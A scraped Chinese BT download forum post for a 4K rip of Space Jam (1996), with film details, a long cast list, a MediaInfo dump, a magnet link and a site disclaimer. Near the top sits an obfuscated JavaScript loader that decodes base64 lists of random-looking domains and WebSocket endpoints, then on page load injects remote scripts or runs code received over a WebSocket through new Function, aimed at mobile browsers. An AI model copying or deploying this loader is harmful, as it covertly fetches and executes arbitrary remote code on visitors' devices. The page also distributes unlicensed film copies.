空中大灌篮[国粤语音轨/双语字幕]Space.Jam.1996.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.4Audio.x265-10bit-迅雷下载 10.82GB

版主小s 18天前 228

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 空中大灌篮 / 太空也入樽(港) / 怪物奇兵(台) / 宇宙大灌篮

◎片 名 Space Jam

◎年 代 1996

◎产 地 美国

◎类 别 喜剧 / 动画 / 运动

◎语 言 英语

◎上映日期 1997-07-15(中国大陆) / 1996-11-15(美国)

◎IMDb链接 https://www.imdb.com/title/tt0117705/

◎豆瓣评分 7.1/10 (36679人评价)

◎豆瓣链接 https://movie.douban.com/subject/1300659/

◎片 长 88 分钟

◎导 演 乔·皮特卡 Joe Pytka (id:1041645)

◎编 剧 莱奥·本韦努蒂 Leo Benvenuti (id:1303189)

蒂莫西·哈里斯 Timothy Harris (id:1010039)

赫舍尔·魏因格罗德 Herschel Weingrod (id:1042057)

◎演 员 迈克尔·乔丹 Michael Jordan (id:1004734)

韦恩·奈特 Wayne Knight (id:1025209)

特里萨·兰德尔 Theresa Randle (id:1014036)

彭妮·贝·布里奇斯 Penny Bae Bridges (id:1068096)

布兰登·哈蒙德 Brandon Hammond (id:1092952)

拉里·伯德 Larry Bird (id:1036915)

比尔·默瑞 Bill Murray (id:1054508)

汤姆·巴瑞 Thom Barry (id:1328759)

查尔斯·巴克利 Charles Barkley (id:1032321)

帕特里克·尤因 Patrick Ewing (id:1023264)

蒂尼·博格斯 Tyrone Bogues (id:1064432)

拉里·约翰逊 Larry Johnson (id:1102889)

肖恩·布拉德利 Shawn Bradley (id:1000894)

Anthony Miller Anthony Miller (id:1114877)

丹·卡斯泰兰尼塔 Dan Castellaneta (id:1041148)

丹尼·德维托 Danny DeVito (id:1040516)

弗拉德·迪瓦茨 Vlade Divac (id:1005445)

查理斯·奥克利 Charles Oakley (id:1038325)

沙朗·莱特 Sharone Wright (id:1007462)

丹尼·安吉 Danny Ainge (id:1033953)

肯特·卡斯帕 Kent Kasper (id:1432997)

吉姆·罗马 Jim Rome (id:1028312)

保罗·韦斯特法尔 Paul Westphal (id:1039107)

A.C.格林 A.C. Green (id:1029261)

杰夫·马龙 Jeff Malone (id:1011504)

德里克·哈勃 Derek Harper (id:1030334)

艾哈迈德·拉什 Ahmad Rashad (id:1041341)

德尔·哈里斯 Del Harris (id:1101006)

阿朗佐·莫宁 Alonzo Mourning (id:1006031)

塞德里克·塞巴洛斯 Cedric Ceballos (id:1023955)

鲍伯·伯根 Bob Bergen (id:1065267)

迪·布拉雷·贝克尔 Dee Bradley Baker (id:1059406)

莫里斯·拉马奇 Maurice LaMarche (id:1055202)

琼·弗雷 June Foray (id:1054753)

道林·海伍德 Dorian Harewood (id:1054680)

帕翠西亚·希顿 Patricia Heaton (id:1031907)

弗兰克·维尔克 Frank Welker (id:1031825)

Albert Hague Albert Hague (id:1027651)

吉姆·怀斯 Jim Wise (id:1025415)

Amy Chance Amy Chance (id:1077466)

TK·卡特 T.K. Carter (id:1078388)

比尔·法玛尔 Bill Farmer (id:1283454)

布拉德·威廉姆·亨克 Brad William Henke (id:1002801)

比利·维斯特 Billy West (id:1165301)

凯斯·索西 Kath Soucie (id:1154840)

Kelly Vint Kelly Vint (id:1149930)

Michael Rothhaar Michael Rothhaar (id:1144976)

William G. Schilling William G. Schilling (id:1141926)

凯瑟琳·瑞特曼 Catherine Reitman (id:1141369)

安德雷·罗塞·布朗 Andre Rosey Brown (id:1078699)

丹尼尔·戈德堡 Daniel Goldberg (id:1285031)

杰里·里斯 Jerry Rees (id:1295376)

Ron Tippe Ron Tippe (id:1299303)

艾莉森·阿巴特 Allison Abbate (id:1276724)

谢尔顿·卡恩 Sheldon Kahn (id:1288017)

乔伊·麦迪贾克 Joe Medjuck (id:1005607)

戈登·A·韦伯 Gordon A. Webb (id:1038376)

伊万·雷特曼 Ivan Reitman (id:1041182)

詹姆斯·纽顿·霍华德 James Newton Howard (id:1019135)

迈克尔·查普曼 Michael Chapman (id:1075517)

谢尔顿·卡恩 Sheldon Kahn (id:1288017)

珍妮特·希尔森 Janet Hirshenson (id:1286699)

简·詹金斯 Jane Jenkins (id:1103031)

杰弗里·科克兰德 Geoffrey Kirkland (id:1288632)

戴维·F·克拉森 David F. Klassen (id:1288673)

珍妮弗·威廉姆斯 Jennifer Williams (id:1300970)

玛琳·斯图尔特 Marlene Stewart (id:1051194)

罗杰·库帕里安 Roger Kupelian (id:1276667)

克里斯·戴尔·康特 Chris Del Conte (id:1282169)

帕米拉·伊斯利 Pamela Easley (id:1282940)

Matt Johnson Matt Johnson (id:1287813)

小罗尼·E·威廉姆斯 Ronnie E. Williams Jr. (id:1164066)

埃德·琼斯 Ed Jones (id:1287861)

Michael Kory Michael Kory (id:1288909)

Simon Eves Simon Eves (id:1086652)

罗布·加德纳 Robb Gardner (id:1091742)

杰·库珀 Jay Cooper (id:1281222)

Kevin Oakley Kevin Oakley (id:1129709)

梅于尔·帕特尔 Mayur Patel (id:1137217)

Hiram Ramos Maxemin (id:1242661)

Charles Darby (id:1231142)

Brett Gassaway Brett Gassaway (id:1212657)

Tim Walton Tim Walton (id:1198322)

Damon Crowe Damon Crowe (id:1175575)

Mark Tait Lewis Mark Tait Lewis (id:1289972)

基姆·利布莱利 Kim Libreri (id:1290016)

马克·内特尔顿 Mark Nettleton (id:1293077)

后藤淳子 Jinko Gotoh (id:1306315)

伊莱·贾拉 Eli Jarra (id:1305425)

帕特里克·图巴赫 Patrick Tubach (id:1299595)

内尔森·塞普维达 Nelson Sepulveda (id:1297217)

John E. Sasaki John E. Sasaki (id:1296724)

苏·罗 Sue Rowe (id:1296234)

查尔斯·泰特 Charles Tait (id:1149185)

Barnaby Robson Barnaby Robson (id:1036046)

Dale Stelly Dale Stelly (id:1037704)

Ken Dailey Ken Dailey (id:1281726)

Erik Dehkhoda Erik Dehkhoda (id:1048839)

伊万·雅格布斯 Evan Jacobs (id:1042616)

Jonathan Privett Jonathan Privett (id:1294935)

Bill Gilman Bill Gilman (id:1039064)

Jim Flynn Jim Flynn (id:1034594)

◎标 签 动画 / 美国 / 乔丹 / 喜剧 / 美国电影 / 空中大灌篮 / 1996 / 动画片

◎简 介

美国NBA传奇人物迈克?乔丹(Michael Jordan)在事业最顶峰之际引退篮坛,决定转入职棒。与此同时,怪物行星的太空游乐场经营遭遇窘境,游乐场老板派出手下的小怪物们前往地球,目的是绑架华纳公司包括兔八哥、太妃鸭、三只小猪等在内的动画片明星们为游乐场招揽顾客。为了维护自由,动画明星们紧急磋商对策,他们自作聪明认为外星怪物身材短小,于是决定采取篮球比赛的方式决定胜负。

不过动画明星的如意算盘落空,小怪物们暗中盗取了皮蓬、巴克利等NBA明星们的球技,变成了身形健壮修长、球技高超的怪物篮球手。眼看败局已定,兔八哥紧急找来迈克?乔丹助阵,决定动画明星去留的时刻越来越近……

◎获奖情况 (共4项)

第25届动画安妮奖 (1997)

最佳动画长片(提名)

最佳导演(提名)

└──布鲁斯·W·史密斯 (id:1297848)

└──托尼·塞沃恩 (id:1280366)

最佳制作(提名)

└──Ron Tippe (id:1299303)

最佳动画技术成果

  1. General

  2. Unique ID : 152683544135209957261126906410585916077 (0x72DDC7ED6BF23566CED293A4F0C582AD)

  3. Complete name : Space.Jam.199[email protected]BBQDDQ.COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 10.8 GiB

  7. Duration : 1 h 27 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 17.7 Mb/s

  10. Movie name : Space Jam

  11. Encoded date : UTC 2021-07-12 07:39:09

  12. Writing application : mkvmerge v44.0.0 ('Domino') 64-bit

  13. Writing library : libebml v1.3.10 + libmatroska v1.5.2

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@High

  21. HDR format : SMPTE ST 2086, HDR10 compatible

  22. Codec ID : V_MPEGH/ISO/HEVC

  23. Duration : 1 h 27 min

  24. Bit rate : 13.2 Mb/s

  25. Width : 3 840 pixels

  26. Height : 2 072 pixels

  27. Display aspect ratio : 1.85:1

  28. Frame rate mode : Constant

  29. Frame rate : 23.976 (24000/1001/53354) FPS

  30. Color space : YUV

  31. Chroma subsampling : 4:2:0

  32. Bit depth : 10 bits

  33. Bits/(Pixel*Frame) : 0.069

  34. Stream size : 8.07 GiB (75%)

  35. Title : @HDSky

  36. Writing library : x265 - H.265/HEVC codec

  37. Default : Yes

  38. Forced : No

  39. Color range : Limited

  40. Color primaries : BT.2020

  41. Transfer characteristics : PQ

  42. Matrix coefficients : BT.2020 non-constant

  43. Mastering display color primaries : Display P3

  44. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  45. Maximum Content Light Level : 739 cd/m2

  46. Maximum Frame-Average Light Level : 331 cd/m2


  47. Audio #1

  48. ID : 2

  49. Format : MLP FBA 16-ch

  50. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  51. Commercial name : Dolby TrueHD with Dolby Atmos

  52. Codec ID : A_TRUEHD

  53. Duration : 1 h 27 min

  54. Bit rate mode : Variable

  55. Bit rate : 3 580 kb/s

  56. Maximum bit rate : 5 421 kb/s

  57. Channel(s) : 8 channels

  58. Channel layout : L R C LFE Ls Rs Lb Rb

  59. Sampling rate : 48.0 kHz

  60. Frame rate : 1 200.000 FPS (40 SPF)

  61. Compression mode : Lossless

  62. Stream size : 2.18 GiB (20%)

  63. Title : English

  64. Language : English

  65. Default : Yes

  66. Forced : No

  67. Number of dynamic objects : 11

  68. Bed channel count : 1 channel

  69. Bed channel configuration : LFE


  70. Audio #2

  71. ID : 3

  72. Format : AC-3

  73. Format/Info : Audio Coding 3

  74. Commercial name : Dolby Digital

  75. Codec ID : A_AC3

  76. Duration : 1 h 27 min

  77. Bit rate mode : Constant

  78. Bit rate : 192 kb/s

  79. Channel(s) : 2 channels

  80. Channel layout : L R

  81. Sampling rate : 48.0 kHz

  82. Frame rate : 31.250 FPS (1536 SPF)

  83. Compression mode : Lossy

  84. Delay relative to video : 24 ms

  85. Stream size : 120 MiB (1%)

  86. Title : Mandarin

  87. Language : Chinese

  88. Service kind : Complete Main

  89. Default : No

  90. Forced : No


  91. Audio #3

  92. ID : 4

  93. Format : AC-3

  94. Format/Info : Audio Coding 3

  95. Commercial name : Dolby Digital

  96. Codec ID : A_AC3

  97. Duration : 1 h 27 min

  98. Bit rate mode : Constant

  99. Bit rate : 384 kb/s

  100. Channel(s) : 6 channels

  101. Channel layout : L R C LFE Ls Rs

  102. Sampling rate : 48.0 kHz

  103. Frame rate : 31.250 FPS (1536 SPF)

  104. Compression mode : Lossy

  105. Delay relative to video : 24 ms

  106. Stream size : 240 MiB (2%)

  107. Title : Mandarin

  108. Language : Chinese

  109. Service kind : Complete Main

  110. Default : No

  111. Forced : No


  112. Audio #4

  113. ID : 5

  114. Format : AC-3

  115. Format/Info : Audio Coding 3

  116. Commercial name : Dolby Digital

  117. Codec ID : A_AC3

  118. Duration : 1 h 27 min

  119. Bit rate mode : Constant

  120. Bit rate : 192 kb/s

  121. Channel(s) : 2 channels

  122. Channel layout : L R

  123. Sampling rate : 48.0 kHz

  124. Frame rate : 31.250 FPS (1536 SPF)

  125. Compression mode : Lossy

  126. Delay relative to video : 24 ms

  127. Stream size : 120 MiB (1%)

  128. Title : Cantonese

  129. Language : Chinese

  130. Service kind : Complete Main

  131. Default : No

  132. Forced : No


  133. Text #1

  134. ID : 6

  135. Format : PGS

  136. Muxing mode : zlib

  137. Codec ID : S_HDMV/PGS

  138. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  139. Duration : 1 h 26 min

  140. Bit rate : 45.6 kb/s

  141. Count of elements : 3028

  142. Stream size : 28.3 MiB (0%)

  143. Title : ENG

  144. Language : English

  145. Default : Yes

  146. Forced : No


  147. Text #2

  148. ID : 7

  149. Format : PGS

  150. Muxing mode : zlib

  151. Codec ID : S_HDMV/PGS

  152. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  153. Duration : 1 h 26 min

  154. Bit rate : 21.6 kb/s

  155. Count of elements : 2211

  156. Stream size : 13.4 MiB (0%)

  157. Title : CHS

  158. Language : Chinese

  159. Default : No

  160. Forced : No


  161. Text #3

  162. ID : 8

  163. Format : PGS

  164. Muxing mode : zlib

  165. Codec ID : S_HDMV/PGS

  166. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  167. Duration : 1 h 26 min

  168. Bit rate : 22.2 kb/s

  169. Count of elements : 2211

  170. Stream size : 13.8 MiB (0%)

  171. Title : CHT

  172. Language : Chinese

  173. Default : No

  174. Forced : No


  175. Text #4

  176. ID : 9

  177. Format : PGS

  178. Muxing mode : zlib

  179. Codec ID : S_HDMV/PGS

  180. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  181. Duration : 1 h 26 min

  182. Bit rate : 40.5 kb/s

  183. Count of elements : 2213

  184. Stream size : 25.2 MiB (0%)

  185. Title : CHS&ENG

  186. Language : Chinese

  187. Default : No

  188. Forced : No


  189. Text #5

  190. ID : 10

  191. Format : PGS

  192. Muxing mode : zlib

  193. Codec ID : S_HDMV/PGS

  194. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  195. Duration : 1 h 26 min

  196. Bit rate : 41.1 kb/s

  197. Count of elements : 2213

  198. Stream size : 25.5 MiB (0%)

  199. Title : CHT&ENG

  200. Language : Chinese

  201. Default : No

  202. Forced : No


  203. Menu

  204. 00:00:00.000 : en:第 01 章

  205. 00:02:21.641 : en:第 02 章

  206. 00:05:53.853 : en:第 03 章

  207. 00:09:00.248 : en:第 04 章

  208. 00:11:34.944 : en:第 05 章

  209. 00:14:07.012 : en:第 06 章

  210. 00:18:13.467 : en:第 07 章

  211. 00:21:35.627 : en:第 08 章

  212. 00:24:25.297 : en:第 09 章

  213. 00:25:46.086 : en:第 10 章

  214. 00:27:44.412 : en:第 11 章

  215. 00:30:25.532 : en:第 12 章

  216. 00:31:18.710 : en:第 13 章

  217. 00:34:04.000 : en:第 14 章

  218. 00:36:58.299 : en:第 15 章

  219. 00:38:10.913 : en:第 16 章

  220. 00:39:38.417 : en:第 17 章

  221. 00:42:10.069 : en:第 18 章

  222. 00:45:53.083 : en:第 19 章

  223. 00:46:38.712 : en:第 20 章

  224. 00:47:10.786 : en:第 21 章

  225. 00:48:04.798 : en:第 22 章

  226. 00:50:00.038 : en:第 23 章

  227. 00:53:39.883 : en:第 24 章

  228. 00:56:55.745 : en:第 25 章

  229. 00:57:55.972 : en:第 26 章

  230. 01:00:13.067 : en:第 27 章

  231. 01:02:26.576 : en:第 28 章

  232. 01:04:08.678 : en:第 29 章

  233. 01:06:05.419 : en:第 30 章

  234. 01:07:41.474 : en:第 31 章

  235. 01:09:31.792 : en:第 32 章

  236. 01:11:46.802 : en:第 33 章

  237. 01:12:29.303 : en:第 34 章

  238. 01:14:15.451 : en:第 35 章

  239. 01:15:24.895 : en:第 36 章

  240. 01:18:22.489 : en:第 37 章

  241. 01:26:52.207 : en:第 38 章


TAGS 动画 喜剧 运动

磁力链:
  • magnet:?xt=urn:btih:0AE0BC7C52B09365851B86D3FA7739E641C5B8FB
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回